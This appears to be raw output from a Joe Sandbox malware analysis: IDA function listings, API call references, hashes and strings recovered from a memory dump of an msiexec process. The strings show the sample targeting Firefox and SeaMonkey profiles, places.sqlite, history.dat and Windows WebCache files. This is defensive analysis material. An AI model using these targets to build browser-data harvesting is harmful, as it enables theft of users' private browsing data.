                                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403E50
                                                                                            • memset.MSVCRT ref: 00403E65
                                                                                            • memset.MSVCRT ref: 00403E7A
                                                                                            • memset.MSVCRT ref: 00403E8F
                                                                                            • memset.MSVCRT ref: 00403EA4
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 00403F6B
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                            • API String ID: 1829478387-2068335096
                                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403FE1
                                                                                            • memset.MSVCRT ref: 00403FF6
                                                                                            • memset.MSVCRT ref: 0040400B
                                                                                            • memset.MSVCRT ref: 00404020
                                                                                            • memset.MSVCRT ref: 00404035
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 004040FC
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                            • API String ID: 1829478387-3369679110
                                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                            • API String ID: 3510742995-2641926074
                                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                                            • free.MSVCRT ref: 0041848B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateErrorFileLastfree
                                                                                            • String ID: |A
                                                                                            • API String ID: 981974120-1717621600
                                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                            APIs
                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                            • memset.MSVCRT ref: 004033B7
                                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                            • String ID: $0.@
                                                                                            • API String ID: 2758756878-1896041820
                                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403C09
                                                                                            • memset.MSVCRT ref: 00403C1E
                                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: memsetwcscat$wcscpywcslen
                                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040A824
                                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 00414458
                                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                            • String ID: "%s"
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004087D6
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                            • memset.MSVCRT ref: 00408828
                                                                                            • memset.MSVCRT ref: 00408840
                                                                                            • memset.MSVCRT ref: 00408858
                                                                                            • memset.MSVCRT ref: 00408870
                                                                                            • memset.MSVCRT ref: 00408888
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Similarity
                                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: memcmp
                                                                                            • String ID: @ $SQLite format 3
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: _wcsicmpqsort
                                                                                            • String ID: /nosort$/sort
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040E60F
                                                                                            • memset.MSVCRT ref: 0040E629
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Strings
                                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                            Similarity
                                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                            APIs
                                                                                            Strings
                                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                            APIs
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressProc$memcmp
                                                                                            • String ID: $$8
                                                                                            APIs
                                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                            • String ID:
                                                                                            • API String ID: 1979745280-0
                                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                            APIs
                                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                            • free.MSVCRT ref: 00418803
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                            • String ID:
                                                                                            • API String ID: 1355100292-0
                                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                            APIs
                                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                            • memset.MSVCRT ref: 00414C87
                                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProcVersionmemsetwcscpy
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                            • API String ID: 4182280571-2036018995
                                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                            APIs
                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                            • memset.MSVCRT ref: 00403A55
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                            • String ID: history.dat$places.sqlite
                                                                                            • API String ID: 2641622041-467022611
                                                                                            • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                            • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                            APIs
                                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$File$PointerRead
                                                                                            • String ID:
                                                                                            • API String ID: 839530781-0
                                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID: *.*$index.dat
                                                                                            • API String ID: 1974802433-2863569691
                                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                            • String ID:
                                                                                            • API String ID: 3397143404-0
                                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
